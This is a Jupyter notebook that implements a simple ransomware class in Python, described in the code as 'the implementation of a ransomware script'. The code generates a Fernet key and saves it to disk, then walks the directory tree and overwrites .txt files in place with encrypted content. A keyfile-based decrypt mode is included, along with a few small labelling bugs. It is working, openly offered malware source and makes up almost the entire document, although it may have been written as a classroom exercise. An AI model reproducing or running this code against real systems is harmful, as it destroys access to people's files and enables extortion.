In [1]:
!pip install cryptography.fernet

ERROR: Could not find a version that satisfies the requirement cryptography.fernet (from versions: none)
ERROR: No matching distribution found for cryptography.fernet


In [2]:
!pip install cryptography

In [ ]:
#This is the implementation of a ransomware script

import os
from os.path import expanduser
from cryptography.fernet import Fernet

class Ransomware(object):
    
    def __init__(self):
        self.key = None
        self.cryptor = None
        self.file_ext_target = ['txt']
        
        
    def generate_key(self):
        self.key = Fernet.generate_key()
        self.cryptor = Fernet(self.key)
        
        
    def read_key(self, keyfile_name):
        with open(keyfile_name, "rb") as f:
            self.key = f.read()
            self.cryptor = Fernet(self.key)
        
        
    def write_key(self, keyfile_name):
        print(self.key)
        with open(keyfile_name, "wb") as f:
            f.write(self.key)
            
            
    def crypt_root(self, root_dir, encrypted=False):
        for root, _, files in os.walk(root_dir):
            for f in files:
                abs_file_path = os.path.join(root, f)
                if not abs_file_path.split(".")[-1] in self.file_ext_target:
                    continue
                self.crypt_file(abs_file_path, encrypted= encrypted)
                
                
    def crypt_file(self, file_path, encrypted=False):
        with open(file_path, "rb+") as f:
            _data = f.read()
            if not encrypted:
                print()
                print(f"files contained before encryption :{_data}")
                data = self.cryptor.encrypt(_data)
                print(f"files contained after encryption :{data}")
            else:
                data = self.cryptor.decrypt(_data)
                print(f"files contained before encryption :{data}")
            f.seek(0)
            f.write(data)
            
if __name__ == "__main__":
    local_root = "."
    
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("--action", required=True)
    parser.add_argument("--keyfile")
    
    args = parser.parse_args()
    action = args.action.lower()
    keyfile = args.keyfile
    
    ransom = Ransomware()
    
    if action == "decrypt":
        if keyfile is None:
            print("Path to keyfile must be included for encryption")
        else:
            ransom.read_key(keyfile)
            ransom.crypt_root(local_root, encrypted=True)
    elif action == "encrypted":
        ransom.generate_key()
        ransom.write_key("keyfile")
        ransom.crypt_root(local_root)